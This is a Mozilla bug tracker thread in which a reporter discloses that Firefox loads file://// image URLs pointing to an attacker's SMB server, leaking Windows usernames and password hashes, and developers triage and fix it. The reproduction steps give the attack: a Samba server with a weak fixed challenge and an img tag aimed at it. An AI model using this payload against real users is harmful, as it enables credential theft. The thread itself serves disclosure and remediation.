User-Agent: Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7) Gecko/20040626 Firefox/0.9.1 Build Identifier: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) [Firefox 0.9.1] In the URL above, a security exploit from a while back is described. Firefox is vulnerable to this attack. Evil SMB & Web servers can collect your Windows username, your Windows Lanman Password, Your Windows NT Password, your Windows Machine Name, your Windows Domain Name. Since the evil server (not our client) determins the Challenge in Challenge/Response, it can be a contrived value that makes decrypting the original passwors much easier. I can demonstrate to a few key folks at Mozilla.org so that we can get it fixed, but I don't want to flood the net with exploits on how it works. Please contact me if I can provie more info. Reproducible: Sometimes Steps to Reproduce: 1. Setup Samba on a box on the net, modifying a few lines of code to fix the "Challenge" to a weak value. 2. Place an image on the Samba share, allowing all to read once authenticated. 3. Put an <img src=file:////ipOfSMBServer/share/image.gif> any or all web sites you want to. 4. Firefox will strip off the first two slashes and convert the remainder to back slashes. For example if the evil server was 10.2.3.4, the UNC pathname is fetched by windows \\10.2.3.4\share\image.gif. 5. The OS will then gladly provide all authentication asked by the evil smb server. Actual Results: Most windows clients using weak or no firewalls gladly send your credentials to the evil smb server where they are harvested. Weak firewalls include standard consumer grade (Linksys, Netgear...). Expected Results: Prevent references to file://// if the referring url is not already file://// Please contact me at (614)751-9329 after business hours if I can provide more information. You can also reach me by email at email@example.com.
See also bug 69070. Jesse points out that we'd still want to fix this bug as well since there may be other places where CheckLoadURI isn't called. To solve this bug, perhaps we just need to modify how we compute the origin for file:// URLs when a SMB share is specified. Confirming bug. This is pretty serious given the relative weakness of the LMv1 hash.
Status: UNCONFIRMED → NEW
Ever confirmed: true
bz: here's an example exploit that leverages bug 69070.
> To solve this bug, perhaps we just need to modify how we compute the origin for > file:// URLs when a SMB share is specified. er... nevermind. i was thinking about cross-site scripting, but that's something else completely. calling CheckLoadURI for <img> loads seems like the right fix for this bug. doing an audit of the code to make sure that we are calling CheckLoadURI everywhere that it is needed is probably a good idea :)
Doing such an audit is an absolute must, yes.
Depends on: 69070
> Jesse points out that we'd still want to fix this bug as > well since there may be other places where CheckLoadURI isn't called. A better argument: we'd still want to fix this bug because sites shouldn't be able to steal your Windows password by merely getting you to load a file: URL.
Not firefox-specific, over to networking. Note bug 69070 has been fixed, but we should still fix this one.
Assignee: firefox → darin
Component: General → Networking
Product: Firefox → Core
Version: unspecified → Trunk
I think we want to implement bug 250691 to make it harder to exploit the user if they happen to send their domain\username + password to an evil site. Most modern servers understand the NTLM hash (MD4 based), so we can probably get away with not sending the older and much weaker LM hash.
Status: NEW → ASSIGNED
Target Milestone: --- → mozilla1.8beta2
Severity: normal → major
Depends on: 250691
Priority: -- → P1
This is now fixed for Firefox 1.1. See bug 250691. Is this something we should consider backporting?
Status: ASSIGNED → RESOLVED
Last Resolved: 13 years ago
Resolution: --- → FIXED
Does this still need to be security-sensitive? It sounds like it was fixed for Firefox 1.5.
You need to log in before you can comment on or make changes to this bug.